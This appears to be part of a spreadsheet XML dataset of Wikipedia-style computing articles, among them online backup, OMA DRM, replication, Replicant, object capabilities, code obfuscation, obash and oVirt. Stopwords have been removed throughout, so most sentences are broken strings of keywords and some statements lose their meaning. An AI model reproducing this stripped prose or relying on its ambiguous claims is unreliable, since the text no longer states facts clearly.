cost factors online backup services usually priced function following things: total amount data backed total amount data restored. number machines covered backup service. maximum number versions file kept. data retention archiving period options managed backups unmanaged backups level service features availablesome vendors limit number versions file kept system. some services omit restriction provide unlimited number versions. add-on features (plug-ins), like ability back currently open locked files, usually charged extra, services provide built most remote backup services reduce amount data sent wire backing changed files. this approach backing means customers total stored data reduced. reducing amount data sent also stored drastically reduced transmitting changed data bits binary block level incremental backups. solutions transmit changed binary data bits waste bandwidth transmitting file data small amounts change. advantages remote backup advantages traditional backup methods: remote backup require user intervention. user change tapes, label perform manual steps. unlimited data retention (presuming backup provider stays business). some remote backup services work continuously, backing files changed. most remote backup services maintain list versions files. most remote backup services 2048 encryption send data unsecured links (e.g. internet). remote backup services reduce backup transmitting changed data. manage secure digital data information. disadvantages remote backup disadvantages traditional backup methods: depending available network bandwidth, restoration data slow. because data stored offsite, data must recovered either internet disk shipped online backup service provider. some backup service providers guarantee stored data kept private. possible remote backup service provider could business purchased, affect accessibility one's data cost continue using service. encryption password lost, data recovery impossible. however, managed services problem. residential broadband services often monthly limits preclude large backups. they also usually asymmetric; user-to-network link regularly used store backups much slower network-to-user link used data restored. terms price, looking cost hard disks, remote backups cost 1-20 times local backup would. managed unmanaged some services provide expert backup management services part overall offering. these services typically include: assistance configuring initial backup continuous monitoring backup processes client machines ensure backups actually happen proactive alerting event backups fail assistance restoring recovering data scheduled manual event-based backup there three distinct types backup modes: scheduled, manual event-based. scheduled backup data backed according fixed schedule. manual backup backup data triggered user input. event-based backup backup data triggered computer events, e.g. database application stoppage (cold backup). also references external links nist definition cloud computing</t>
  </si>
  <si>
    <t>Remote outdoor router</t>
  </si>
  <si>
    <t>OMA DRM</t>
  </si>
  <si>
    <t>digital rights management (drm) system invented open mobile alliance, whose members represent mobile phone manufacturers (e.g. nokia, motorola, samsung, sony-ericsson, benq-siemens), mobile system manufacturers (e.g. ericsson, siemens, openwave), mobile phone network operators (e.g. vodafone, cingular, deutsche telekom, orange), information technology companies (e.g. microsoft, ibm, sun). provides content creators enforced limits duplication content customers. system implemented many recent phones. date, versions released: 2.0. order ensure manufacturers' implementations work other, open mobile alliance provides specifications test tools drm. group chaired sergey seleznev (samsung electronics). versions version first drafted november 2002, approved june 2004. provides basic digital rights management, without strong protection. standard specifies three main methods: forward lock, combined delivery (combined rights object media object), separate delivery (separated rights object encrypted media object). forward lock prevents user forwarding content ringtones wallpapers phone. content distributed using http mms. version drafted july 2004 approved march 2006. primary feature extension 1.0's separate delivery mechanism. each participating device individual public infrastructure (pki) certificate, public corresponding private key. each rights object (ro) individually protected receiving device encrypting device public key. turn contains used decrypt media object. delivery rights objects requires registration rights issuer (the entity distributing rights objects). during registration, device certificate usually validated device blacklist means online certificate status protocol (ocsp) verification. thus, devices known hacked excluded register rights issuer order receive rights objects access content. started september 2005 approved march 2009, goal secure removable media (srm) work item define protection consumption digital content associated usage rights srm. removable medium implements means protect unauthorized access internal data, secure memory card smart card. work item stand alone; extends existing specifications. while defines general framework downloading rights devices sharing rights domain, work item defines mechanisms protocols srm. extends version 2.1, allowing users move rights devices srms, consume rights stored srms without generating managing complex groups devices domain. started december 2008 approved june 2011, extension introducing functions content license move srms, direct license provisioning support broadcasting (oma bcast) tokens. latter allows turn secure electronic wallet capable store credits used subscribe mobile broadcast multicast services. started september 2005 approved december 2008 candidate enabler. goal secure content exchange (sce) extend v2.0, enabling seamless sharing purchased content multiple devices, including devices owned subscriber (phone, home electronics system, audio system, etc.) temporary sharing content device close proximity subscriber’s device (e.g., television friend’s house hotel room user travelling). because single system deployed across different devices, also enhances interoperability non-oma systems, defining import function drm. implementations usage implemented models mobile phone. many mobile operators content services. first implementations released early 2005; implementations installed mobile phones 2005. software implementations personal computer clients also available. most ringtones pre-installed mobile phones implemented drm. many commercial ringtone vendors part mobile phone carrier bother form drm, perhaps number ringtone vendors huge, people choose download unprotected ringtones them. record industry mandate implemented ringtones, unlike digital music stores. many ringtones reverse-engineered ringtone provider themselves, choice whether implement drm. since 2006, working 2.0.1 2.1, features (secure removable media) (secure content exchange). broadcast services security issues profile broadcast services requirements completely different video-on-demand, bcast smartcard profile recommended industries unified standard used mobile broadcast. providers/implementations commercial providers include: authentec castlabs mobile service delivery platform discretix irdeto mutable philips saffron digital viaccessan open source solution also available. licensing format specification uses profile open digital rights language expressing licenses. determining file protected nokia series nokia series phones, installed file "send" option greyed options menu. user attempts send file mms, message stating "the file copyright protected" appear. bluetooth file transfer fail user tries extract file using bluetooth, file still appear present, still deletable bluetooth. however, file (such music track) received separate delivery—the sent separately actual download file, file contains license url—it possible forward file devices. once file activated device, prompt user access embedded file, give user option acquire key. criticism some vendors implement broad systems, restricting consumer rights beyond scope documented standards. example, nokia symbian-based devices completely refuse send files certain types bluetooth. phones, blocks sending midi files, java applets, symbian programs regardless whether protected drm. such phones refuse attempts send files message "unable send protected objects" similar error. this prevents sending content, even content license explicitly allows even depends redistribution. notes external links list releases specifications open mobile alliance</t>
  </si>
  <si>
    <t>Replication (computing)</t>
  </si>
  <si>
    <t>replication computing involves sharing information ensure consistency redundant resources, software hardware components, improve reliability, fault-tolerance, accessibility. terminology replication computing refer data replication, data stored multiple storage devices computation replication, computing task executed many times. computational tasks replicated space, tasks executed separate devices replicated time, tasks executed repeatedly single devicereplication space time often linked scheduling algorithms.access replicated entity typically uniform access single non-replicated entity. replication transparent external user. failure scenario, failover replicas hidden much possible respect quality service.computer scientists describe replication either: active replication, performed processing request every replica passive replication, involves processing every request single replica transferring result replicaswhen leader replica designated leader election process requests, system using primary-backup primary-replica scheme, predominant high-availability clusters. comparison, replica process request distribute state, system using multi-primary multi-master scheme. latter case, form distributed concurrency control must used, distributed lock manager. load balancing differs task replication, since distributes load different computations across machines, allows single computation dropped case failure. load balancing, however, sometimes uses data replication (especially multi-master replication) internally, distribute data among machines. backup differs replication saved copy data remains unchanged long period time. replicas, hand, undergo frequent updates quickly lose historical state. replication oldest important topics overall area distributed systems. data replication computation replication require processes handle incoming events. processes data replication passive operate maintain stored data, reply read requests apply updates. computation replication usually performed provide fault-tolerance, take operation component fails. cases, underlying needs ensure replicas events equivalent orders, stay consistent states replica respond queries. replication models distributed systems three widely cited models exist data replication, properties performance: transactional replication: used replicating transactional data, database. one-copy serializability model employed, defines valid outcomes transaction replicated data accordance overall acid (atomicity, consistency, isolation, durability) properties transactional systems seek guarantee. state machine replication: assumes replicated process deterministic finite automaton atomic broadcast every event possible. based distributed consensus great deal common transactional replication model. this sometimes mistakenly used synonym active replication. state machine replication usually implemented replicated consisting multiple subsequent rounds paxos algorithm. this popularized google's chubby system, core behind open-source keyspace data store. virtual synchrony: involves group processes cooperate replicate in-memory data coordinate actions. model defines distributed entity called process group. process join group provided checkpoint containing current state data replicated group members. processes send multicasts group incoming multicasts identical order. membership changes handled special multicast delivers "membership view" processes group. database replication database replication used many database management systems (dbms), usually primary/replica relationship original copies. primary logs updates, ripple replicas. each replica outputs message stating received update successfully, thus allowing sending subsequent updates. multi-master replication, updates submitted database node, ripple servers. this often desired introduces substantially increased costs complexity make impractical situations. common challenge exists multi-master replication transactional conflict prevention resolution. most synchronous eager) replication solutions perform conflict prevention, asynchronous lazy) solutions perform conflict resolution. instance, record changed nodes simultaneously, eager replication system would detect conflict confirming commit abort transactions. lazy replication system would allow transactions commit conflict resolution re-synchronization. resolution conflict based timestamp transaction, hierarchy origin nodes much complex logic, decides consistently across nodes. database replication becomes complex scales horizontally vertically. horizontal scale-up data replicas, vertical scale-up data replicas located greater physical distances. problems raised horizontal scale-up alleviated multi-layer, multi-view access protocol. early problems vertical scale-up largely addressed improving internet reliability performance.when data replicated database servers, information remains consistent throughout database system users cannot tell even know server dbms using, system said exhibit replication transparency. however, replication transparency always achieved. when data replicated database, constrained theorem pacelc theorem. nosql movement, data consistency usually sacrificed exchange desired properties, availability (a), partition tolerance (p), etc. various data consistency models also developed serve service level agreement (sla) service providers users. disk storage replication active (real-time) storage replication usually implemented distributing updates block device several physical hard disks. this way, file system supported operating system replicated without modification, file system code works level block device driver layer. implemented either hardware disk array controller) software device driver). basic method disk mirroring, typical locally connected disks. storage industry narrows definitions, mirroring local (short-distance) operation. replication extendable across computer network, disks located physically distant locations, primary/replica database replication model usually applied. purpose replication prevent damage failures disasters occur location case events occur, improve ability recover data. replication, latency factor determines either apart sites type replication employed. main characteristic cross-site replication write operations handled, either asynchronous synchronous replication; synchronous replication needs wait destination server's response write operation whereas asynchronous replication not. synchronous replication guarantees "zero data loss" means atomic write operations, write operation considered complete acknowledged local remote storage. most applications wait write transaction complete proceeding work, hence overall performance decreases considerably. inherently, performance drops proportionally distance, minimum latency dictated speed light. distance, fastest possible roundtrip takes whereas entire local cached write completes 10–20 asynchronous replication, write operation considered complete soon local storage acknowledges remote storage updated small lag. performance greatly increased, case local storage failure, remote storage guaranteed current copy data (the recent data lost). semi-synchronous replication typically considers write operation complete acknowledged local storage received logged remote server. actual remote write performed asynchronously, resulting better performance remote storage behind local storage, guarantee durability (i.e., seamless transparency) case local storage failure.point-in-time replication produces periodic snapshots replicated instead primary storage. this intended replicate changed data instead entire volume. less information replicated using method, replication occur less-expensive bandwidth links iscsi instead fiberoptic lines. implementations many distributed filesystems replication ensure fault tolerance avoid single point failure. many commercial synchronous replication systems freeze remote replica fails loses connection behaviour guarantees zero data loss proceed operate locally, losing desired zero recovery point objective. techniques wide-area network (wan) optimization applied address limits imposed latency. file-based replication file-based replication conducts data replication logical level (i.e., individual data files) rather storage block level. there many different ways performing this, almost exclusively rely software. capture kernel driver kernel driver (specifically filter driver) used intercept calls filesystem functions, capturing activity occurs. this uses type technology real-time active virus checkers employ. level, logical file operations captured like file open, write, delete, etc. kernel driver transmits commands another process, generally network different machine, mimic operations source machine. like block-level storage replication, file-level replication allows synchronous asynchronous modes. synchronous mode, write operations source machine held allowed occur destination machine acknowledged successful replication. synchronous mode less common file replication products although solutions exist. file-level replication solutions allow informed decisions replication based location type file. example, temporary files parts filesystem hold business value could excluded. data transmitted also granular; application writes bytes, bytes transmitted instead complete disk block (generally 4,096 bytes). this substantially reduces amount data sent source machine storage burden destination machine. drawbacks software-only solution include requirement implementation maintenance operating system level, increased burden machine's processing power. file system journal replication similarly database transaction logs, many file systems ability journal activity. journal sent another machine, either periodically real time streaming. replica side, journal used play back file system modifications. notable implementations microsoft's system center data protection manager (dpm), released 2005, performs periodic updates offer real-time replication. batch replication this process comparing source destination file systems ensuring destination matches source. benefit solutions generally free inexpensive. downside process synchronizing quite system-intensive, consequently process generally runs infrequently. notable implementations rsync. replication within file paging operating system, pages paging file sometimes replicated within track reduce rotational latency. ibm's vsam, index data sometimes replicated within track reduce rotational latency. distributed shared memory replication another example using replication appears distributed shared memory systems, many nodes system share page memory. this usually means node separate copy (replica) page. primary-backup multi-primary replication many classical approaches replication based primary-backup model device process unilateral control processes devices. example, primary might perform computation, streaming updates backup (standby) process, take primary fails. this approach common replicating databases, despite risk portion lost failure, backup might state identical primary, transactions could lost. weakness primary-backup schemes actually performing operations. fault-tolerance gained, identical backup system doubles costs. reason, starting 1985, distributed systems research community began explore alternative methods replicating data. outgrowth work emergence schemes group replicas could cooperate, process acting backup also handling share workload. computer scientist gray analyzed multi-primary replication schemes transactional model published widely cited paper skeptical approach "the dangers replication solution". argued unless data splits natural database treated disjoint sub-databases, concurrency control conflicts result seriously degraded performance group replicas probably slow function gray suggested common approaches likely result degradation scales o(n³). solution, partition data, viable situations data actually natural partitioning key. 1985–1987, virtual synchrony model proposed emerged widely adopted standard used isis toolkit, horus, transis, ensemble, totem, spread, c-ensemble, phoenix quicksilver systems, basis corba fault-tolerant computing standard). virtual synchrony permits multi-primary approach group processes cooperates parallelize aspects request processing. scheme used forms in-memory data, provide linear speedups size group. number modern products support similar schemes. example, spread toolkit supports virtual synchrony model used implement multi-primary replication scheme; would also possible c-ensemble quicksilver manner. wandisco permits active replication every node network exact copy replica hence every node network active time; scheme optimized wide area network (wan). also change data capture fault-tolerant computer system shipping multi-master replication optimistic replication state machine replication virtual synchrony references</t>
  </si>
  <si>
    <t>Replicant (operating system)</t>
  </si>
  <si>
    <t>replicant free operating system (os) based android mobile platform aims replace proprietary android components free-software counterparts. available several smartphones tablet computers. written programming languages android (which forked indirectly from). modifications mostly language; changes mostly lower-level parts linux kernel drivers name replicant drawn fictional replicant androids blade runner movie. replicant sponsored supported free software foundation partially nlnet. history replicant project started mid-2010 effort consolidate various initiatives attempting produce fully free-as-in-freedom android derivative dream device. original team consisted bradley kuhn, aaron williamson, graziano sorbaioli denis ‘gnutoo’ carikli. project quickly writing replacement code non-free parts required make dream functional. first component replaced permitted audio work without proprietary library. replicant originally provided foss application repository, later replaced f-droid. june 2022, replicant announced removed f-droid.the radio interface layer software handles communication modem replaced free code, thus making telephony part usable. library handling adapted free code originally written another phone permitted dream working replicant.early versions replicant based android open source project code, versions (april 2011) later used cyanogenmod base order make supporting devices easier. blog post february 2017, replicant project said future versions replicant based lineageos, cyanogenmod project discontinued.as development continued, many members original replicant team retired project, making denis "gnutoo" carikli remaining member original team still actively working project. april 2011, paul kocialkowski decided involved project gradually became main replicant developer, successfully porting nexus galaxy devices.in 2014, however, replicant criticized lagging behind. "while cyanogenmod 4.4.4, replicant still stuck android 4.2. runs everything, replicant supported handful devices ranging four years old. plus, replicant aims replace proprietary drivers, actually complete stack drivers device." when smartphone operating systems efforts others, like mozilla, failed gain traction, replicant continued.replicant sponsored supported free software foundation, also hosts replicant's source code. releases following table lists major releases replicant: security march 2014, replicant developers found closed vulnerability present wide range samsung galaxy products allowed baseband processor read write device's storage, sometimes normal user privileges sometimes root user depending device model. replicant's lead developer paul kocialkowski claimed backdoor, contested rosenberg, senior security researcher azimuth security, said "virtually evidence ability remotely execute functionality". there evidence similar exploits apple hardware involve operating system software, "methods detailed take direct advantage apple’s “firmware” permanent software programmed onto device, usually manufacturer." founder ubuntu previously expressed similar concerns. development january 2013, project released replicant fully libre replacement android sdk. replicant released response google updating license add-ons binaries proprietary agreement. replicant's discontinued april 2017 favour free packaged debian. hardware support supported devices scope replicant project gradually expanded include support devices, starting nexus one, nexus galaxy january 2014, following devices supported, wi-fi bluetooth requiring proprietary firmware order work: number supported devices doubled version 2017. device requirements device must supported lineageos/cyanogenmod officially (better) party repos there must flash images (via bootloader recovery) using free program kernel must signed: bootloader must check kernel signature kernel sources must released network type must gsm, cdma phone supported also references external links official website</t>
  </si>
  <si>
    <t>Object-capability model</t>
  </si>
  <si>
    <t>object-capability model computer security model. capability describes transferable right perform more) operations given object. obtained following combination: unforgeable reference sense object references protected pointers) sent messages. message specifies operation performed.the security model relies able forge references. objects interact sending messages references. reference obtained by:initial conditions: initial state computational world described, object already reference object parenthood: creates moment obtains reference newly created endowment: creates born subset references chose endow introduction: references send message containing reference retain reference subsequent use.in object-capability model, computation performed following rules. advantages motivate object-oriented programming, encapsulation information hiding, modularity, separation concerns, correspond security goals least privilege privilege separation capability-based programming.the object-capability model first proposed jack dennis earl horn 1966. loopholes object-oriented programming languages some object-based programming languages (e.g. javascript, java, provide ways access resources ways according rules including following: direct assignment instance variables object java direct reflective inspection meta-data object java pervasive ability import primitive modules, e.g. java.io.file enable external effects.such undeniable authority violates conditions object-capability model. caja joe-e variants javascript java, respectively, impose restrictions eliminate loopholes. advantages object capabilities computer scientist dean tribble stated smart contracts, identity-based access control support well dynamically changing permissions, compared object-capability model. analogized ocap model giving valet one's car, without handing right ownership.the structural properties object capability systems favor modularity code design ensure reliable encapsulation code implementation. these structural properties facilitate analysis security properties object-capability program operating system. some particular, information flow properties analyzed level object references connectivity, independent knowledge analysis code determines behavior objects. consequence, security properties established maintained presence objects contain unknown possibly malicious code. these structural properties stem rules governing access existing objects: object send message object holds reference object obtain reference object receives message containing reference c.as consequence rules, object obtain reference another object preexisting chain references. short, "only connectivity begets connectivity." glossary related terms object-capability system computational system implements principles described article. object object local state behavior. object sense subject object sense used access control literature. reference unforgeable communications channel (protected pointer, opaque address) unambiguously designates single object, provides permission send messages object. message what sent reference. depending system, messages first-class objects. request operation message sent reference. when message received, receiver access references included message. attenuation common design pattern object-capability systems: given reference object, create another reference proxy object certain security restrictions, permitting read-only access allowing revocation. proxy object performs security checks messages receives passes allowed. deep attenuation refers case attenuation applied transitively objects obtained original attenuated object, typically "membrane". implementations almost historical systems described "capability systems" modeled object-capability systems. (note, however, uses term "capability" consistent model, posix "capabilities".) keykos, eros, integrity (operating system), capros, coyotos, sel4, okl4 fiasco.oc secure operating systems implement object-capability model. languages implement object capabilities (1981) eden (1985), emerald (1987), trusty scheme (1992), (1995), joule (1996), original-e (1997), oz-e (2005), joe-e (2005), caperl (2006), emily (2006) caja (2007–2021) monte (2008–present) pony (2014–present) wyvern (2012–present) newspeak (2007–present) hacklang (2021-present) rholang (2018-present) also capability-based security capability-based addressing actor model references</t>
  </si>
  <si>
    <t>Obfuscation (software)</t>
  </si>
  <si>
    <t>software development, obfuscation creating source machine code difficult humans understand. like obfuscation natural language, needlessly roundabout expressions compose statements. programmers deliberately obfuscate code conceal purpose (security obscurity) logic implicit values embedded primarily, order prevent tampering, deter reverse engineering, even create puzzle recreational challenge someone reading source code. this done manually using automated tool, latter preferred technique industry. overview architecture characteristics languages make easier obfuscate others. c++, perl programming language examples languages easy obfuscate. haskell also quite obfuscatable despite quite different structure. properties make language obfuscatable immediately obvious. recreational obfuscation writing reading obfuscated source code brain teaser. number programming contests reward creatively obfuscated code, international obfuscated code contest obfuscated perl contest. types obfuscations include simple keyword substitution, non-use whitespace create artistic effects, self-generating heavily compressed programs. according nick montfort, techniques include: naming obfuscation, includes naming variables meaningless deceptive way; data/code/comment confusion, includes making actual code look like comments confusing syntax data; double coding, displaying code poetry form interesting shapes.short obfuscated perl programs used signatures perl programmers. these japhs ("just another perl hacker"). examples this winning entry international obfuscated code contest written phillipps 1988 subsequently reverse engineered thomas ball. program compiled generate verses days christmas. contains strings required poem encoded form within code. non-winning entry year, next example illustrates creative whitespace; generates mazes arbitrary length: ansi-compliant compilers allow constant strings overwritten, avoided changing "*m" "m[3]" omitting "m=". following example óscar toledo gutiérrez, best show entry 19th ioccc, implements 8080 emulator complete terminal disk controller, capable booting cp/m-80 running cp/m applications: example japh: this slowly displays text "just another perl unix hacker", multiple characters time, delays.some python examples found official python programming elsewhere. advantages obfuscation faster loading time scripts used web-pages sent network user agent them. smaller are, faster download. use-cases, minification relatively trivial form obfuscation) produce real advantages. reduced memory usage antique run-time interpreted languages (more commonly known script), like older versions basic, programs executed faster took less used single letter variable names, avoided comments contained necessary blank characters brief, shorter faster). protection trade secrets where source code program must sent user, example javascript page, trade secret, licensing mechanism intellectual property contained within program accessible user. obfuscation makes harder understand code make modifications desktop programs sometimes include features help obfuscate code. some programs store entire code disk, pull portion binary code runtime. they also compression and/or encryption, adding additional steps disassembly process. prevention circumvention obfuscating program can, cases, make harder users circumvent license mechanisms obtain information program's supplier wished hide. also used make harder hack multiplayer games. prevention virus detection malicious programs obfuscation disguise really doing. most users even read programs; typically access software tools help undo obfuscation, strategy limited efficacy. disadvantages obfuscation while obfuscation make reading, writing, reverse-engineering program difficult time-consuming, necessarily make impossible. adds time complexity build process developers. make debugging issues software obfuscated extremely difficult. once code becomes abandonware longer maintained, hobbyists want maintain program, mods, understand better. obfuscation makes hard users useful things code. certain kinds obfuscation (i.e. code local binary downloads mini binaries server needed) degrade performance and/or require internet. decompilers decompiler reverse-engineer source code executable library. decompilation sometimes called man-at-the-end attack, based traditional cryptographic attack known "man-in-the-middle". puts source code hands user, although source code often difficult read. source code likely random function variable names, incorrect variable types, different logic original source code (due compiler optimizations). cryptographic obfuscation recently, cryptographers explored idea obfuscating code reverse-engineering code cryptographically hard. this formalized many proposals indistinguishability obfuscation, cryptographic primitive that, possible build securely, would allow construct many kinds cryptography, including completely novel types knows make. stronger notion, black-box obfuscation, shown impossible 2001 researchers constructed programs cannot obfuscated notion.) notifying users obfuscated code some anti-virus softwares, antivirus, also alert users land website code manually obfuscated, purposes obfuscation hide malicious code. however, developers employ code obfuscation purpose reducing file size increasing security. average user expect antivirus software provide alerts otherwise harmless piece code, especially trusted corporations, feature actually deter users using legitimate software. certain major browsers firefox chrome also disallow browser extensions containing obfuscated code. obfuscating software variety tools exist perform assist code obfuscation. these include experimental research tools created academics, hobbyist tools, commercial products written professionals, open-source software. deobfuscation tools also exist attempt perform reverse transformation. although majority commercial obfuscation solutions work transforming either program source code, platform-independent bytecode used java .net, also work directly compiled binaries. obfuscation copyleft licenses there debate whether illegal skirt copyleft software licenses releasing source code obfuscated form, cases author less willing make source code available. issue addressed general public license requiring "preferred form making modifications" made available. website states "obfuscated 'source code' real source code count source code." also notes references external links international obfuscated code contest protecting java code code obfuscation, crossroads, spring 1998 issue obfuscate programs? yury lifshits. lecture notes program obfuscation (spring'2005) java obfuscators curlie c2:blackboxcomputation</t>
  </si>
  <si>
    <t>Obash</t>
  </si>
  <si>
    <t>obash bash script obfuscator written programming language. obash encodes encrypts bash shell scripts executable binaries much like shc, project inspired uses aes-256 encryption initialization vector retrieved hardware instead hard coded binary itself. obash project started address issues affect shc, main able original shell script source simply issuing -ef. although objectives same, obash shares code built scratch ground code similarities purely accidental dictated shared objectives. obash still work progress master branch github generally usable sources testing branch transition state given time. works internally obash takes input script aes-256 encrypts also base64 encodes cipertext used declare unsigned char array. produces intermediate file basically interpreter (see interpreter.c), functions, text array containing ciphertext, optional reusable binaries (not bound hardware) main. intermediate file compiled executable. intermediate file built following manner (see mk_sh_c function functions.c): includes block interpreter.h crypted_script variable containing aes-256 encrypted script encoded base64 serial uuid variables (empty reusable) functions block interpreter.h main_body block interpreter.hsee recreate_interpreter_header script details interpreter.h created interpreter.c. initialization vector aes-256 encryption hard-coded binary (unless decide build reusable static binary flag) retrieved time hardware (hence binding machine). case reusable static binary (built flag) uuid serial binary manipulated anyway makekey makeiv usable immediately anyone ever inspect binary itself. although whereabouts serial uuid retrieved traceable secret (machine uuid serial number reusable random digits reusable) manipulated directly usable code comment suggesting done (see makekey makeiv functions functions.c): every using obash encouraged would fairly easy extract script source obfuscated binary.. distributed code, example, stripped uuid serial padded reach suggested length cipher used. alternatives ccsh shellcrypt references external links https://github.com/louigi600/obash</t>
  </si>
  <si>
    <t>OVirt</t>
  </si>
  <si>
    <t>ovirt free, open-source virtualization management platform. founded community project virtualization based. allows centralized management virtual machines, compute, storage networking resources, easy-to-use web-based front-end platform independent access. x86-64, powerpc64 s390x architecture hypervisors supported, ongoing effort support architecture future releases. architecture ovirt consists basic components, ovirt engine ovirt node. ovirt engine backend written java, frontend developed toolkit. ovirt engine runs wildfly (former jboss) application server. frontend accessed webadmin portal administration, user portal privileges, features fine tuned. user administration managed locally integrating ovirt ldap services. ovirt engine stores data postgresql database. data warehousing reporting capabilities depend additional history reports databases optionally instantiated setup procedure. rest available customizing adding engine features.an ovirt node server running rhel, centos, scientific linux, experimentally debian, hypervisor enabled vdsm (virtual desktop server manager) daemon written python. management resources initiated webadmin portal sent engine backend issues appropriate calls vdsm daemon. vdsm controls resources available node (compute, storage, networking) virtual machines running also responsible providing feedback engine initiated operations. multiple nodes clustered ovirt engine webadmin portal enhance ras. ovirt engine installed standalone server, hosted cluster nodes inside virtual machine (self-hosted engine). self-hosted engine manually installed automatically deployed virtual appliance.ovirt built upon several projects including libvirt, gluster, patternfly, ansible. features virtual datacenters, managed ovirt, categorized storage, networking clusters consist ovirt nodes. data integrity ensured fencing, agents various resources baseboard management controllers uninterruptible power supplies. storage organized within entities called storage domains local shared. storage domains created using following storage solutions protocols: iscsi fibre channel posix compliant filesystem glusterfsnetwork management allows defining multiple vlans bridged network interfaces available nodes. configuration bonded interfaces, addresses, subnet masks gateways managed nodes supported within webadmin portal interface, sr-iov hardware configurations support feature. management features compute resources include pinning, defining numa topology, enabling kernel same-page merging, memory over-provisioning, reservation etc. virtual machine management enables selecting high availability priority, live migration, live snapshots, cloning virtual machines snapshots, creating virtual machine templates, using cloud-init automated configuration provisioning deployment virtual machines. supported guest operating systems include linux, microsoft windows freebsd. access virtual machines achieved webadmin portal using spice, protocols. ovirt integrated many open source projects, including openstack glance neutron disk network provisioning, foreman/katello vm/node provisioning pulling relevant errata information webadmin portal integrated manageiq complete virtual infrastructure lifecycle management. disaster recovery features include ability import storage domain different ovirt engine instances replication managed ovirt glusterfs geo-replication feature, utilizing synchronous/asynchronous block level replication provided storage hardware vendors. ovirt engine backups automated periodically transferred remote location. ovirt supports hyper-converged infrastructure deployment scenarios. self-hosted engine gluster-based storage domains allow centralized management resources seamlessly expanded, simply adding appropriate number nodes cluster, without single points failure. ovirt provides deep integration gluster, including gluster specific performance improvements. also virtualization (rhv) kernel-based virtual machine (kvm) comparison platform virtualization software references external links official website</t>
  </si>
  <si>
    <t>OVPsim</t>
  </si>
  <si>
    <t>ovpsim multiprocessor platform emulator (often called full-system simulator) used unchanged production binaries target hardware. public apis allowing users create processor, peripheral platform models. various models available open source. ovpsim component open virtual platforms initiative (ovp), organization created promote open virtual platforms embedded software development. ovpsim requires registration download. licensing ovpsim developed maintained imperas. core simulation platform proprietary software; available free charge non-commercial usage. commercial usage requires low-cost license imperas cover maintenance. various processor, peripheral platform models available free software apache license version 2.0. details there three main components ovp: open-source models, fast ovpsim simulator, modeling apis. these components designed make easy assemble multi-core heterogeneous homogeneous platforms complex memory hierarchies, cache systems layers embedded software hundreds mips standard desktop pcs. ovpsim considered instruction accurate, cycle-accurate. there many examples components, complete virtual platforms boot linux kernel seconds homepage. open source models within several different model categories. these models provided pre-compiled object code, cases, source files. ovpsim longer supplies source code mips processor models. currently processor models (processors using armv4, armv5, armv6, armv7, armv8 instruction sets) cortex-a72mpx4 (and including multi-cluster armv8 models gicv3), imagination mips (processors using mips32, mips64, micromips, nanomips mips instruction sets) microaptiv, interaptiv, proaptiv, warrior cores, synopsys virage arc600/arc700 series, renesas v850, rh850, rl78 m16c, powerpc, altera nios xilinx microblaze, risc-v (models using 32bit rv32i, rv32m, rv32im, rv32a, rv32ima, rv32imac, rv32f, rv32d, rv32e, rv32ec, rv32c, rv32g, rv32gc, rv32gcn, rv32imafd 64bit rv64i, rv64m, rv64imac, rv64f, rv64d, rv64c, rv64g, rv64gc, rv64gcn, rv64imafd subsets), andes technology n25/nx25, n25f/nx25f, a25/ax25, a25f/ax25f, microsemi coreriscv/miv-rv32ima, sifive e31, e51, u54, u54-mc, freedom u540, codasip series risc-v cores, intel niosv risc-v core, texas instruments tms320 dsp, openrisc families. openhw group uses ovpsim golden reference open source risc-v cv32e40 cv32e20 cores. there also models many different types system components including ram, rom, cache, bridge. there peripheral models ethernet mac, usb, dma, uart, fifo. several different pre-built platforms available, including common operating systems uclinux, linux, android, freertos, nucleus, micrium. main uses simulation infrastructure ability create simulate custom built models—either scratch, using open source models starting point. apis tailored different model types: processors, behavioral models peripherals, platforms. there source model variants available download. ovpsim simulator ovpsim simulator available reference free non-commercial usage. simulator uses dynamic binary translation technology achieve high simulation speeds. more billion simulated instructions second possible, cases regular desktop machines. ovpsim available windows linux hosts. ovpsim comes (remote serial protocol) interface allow applications running simulated processors debugged standard debugger supports interface. ovpsim comes imperas igui graphical debugger also eclipse interface. ovpsim encapsulated called within simulation environments comes standard interface files c++, systemc. ovpsim includes native systemc tlm2.0 interface files. also possible encapsulate legacy models processors behavioral models used ovpsim. modeling apis models created using c/c++ apis. there three main apis: vmi, bhm/ppm. designed controlling, connecting, observing platforms. this called c++, systemc. platform provides basic structure design creates, connects, configures components. platform also specifies address mapping, software loaded processors. easy specify complex complete platforms many different processors, local shared memories, caches, bridges, peripherals complex address maps, interrupts operating systems application software. superseded 2016. still usable older platforms. processor modeling provided api. these functions provide ability easily describe behavior processor. processor model written using decodes target instruction simulated translates native instructions executed used modeling architectures. there interception mechanism enabling emulation calls functions application runtime libraries (such write, fstat etc.) without requiring modification either processor model simulated application. behavioral components, peripherals, overall environment modeled using code calls apis. underlying apis event based scheduling mechanism enable modeling time, events, concurrency. peripheral models provide callbacks called application software running processors modeled platform access memory locations peripheral enabled. users ovpsim used multiple educational establishments provide simulation infrastructure research parallel computing platforms, hardware/software co-design, performance analysis embedded systems, basis embedded tool developments. also leveraged educational courses allow students develop debug application software create virtual platforms models. number leading commercial organizations also ovpsim basis product offerings. technology licensed mips technologies provide modeling support mips architecture embedded processor range, features partnership leading processor provider arm, part europractice product range general access european universities. version ovpsim used risc-v foundation's compliance working group reference simulator. leading semiconductor companies renesas used simulator processor development work, disclosed leading electronic industry publications. selected nephron+, research project, software test development environment. vinchip systems inc. chennai, india used openocd ovpsim develop first 32-bit processor developed india. models virtual platforms form basis activities undertaken imperas. references external links official website imperas multi-core debug profiling tools models ovpsim used emulation mips malta platform europractice</t>
  </si>
  <si>
    <t>Nautilus (secure telephone)</t>
  </si>
  <si>
    <t>nautilus program allows parties securely communicate using modems tcp/ip. runs command line available linux windows operating systems. name based upon jules verne's nautilus ability overcome clipper ship play clipper chip. program originally developed bill dorsey, andy fingerhut, paul rubin, bill soley, david miller. nautilus historically significant realm secure communications first programs released open source general public used strong encryption. created response clipper chip government planned escrow scheme products used chip. this would allow monitor "secure" communications. once program another similar program pgpfone available internet, proverbial "out bag" would nearly impossible stop strong encryption telephone communications. project move presence 2014 decision fraunhofer focus shut developer platform hosted project. external links nautilus homepage 2014 "can nautilus sink clipper?" article wired, 1995</t>
  </si>
  <si>
    <t>OS-level virtualization</t>
  </si>
  <si>
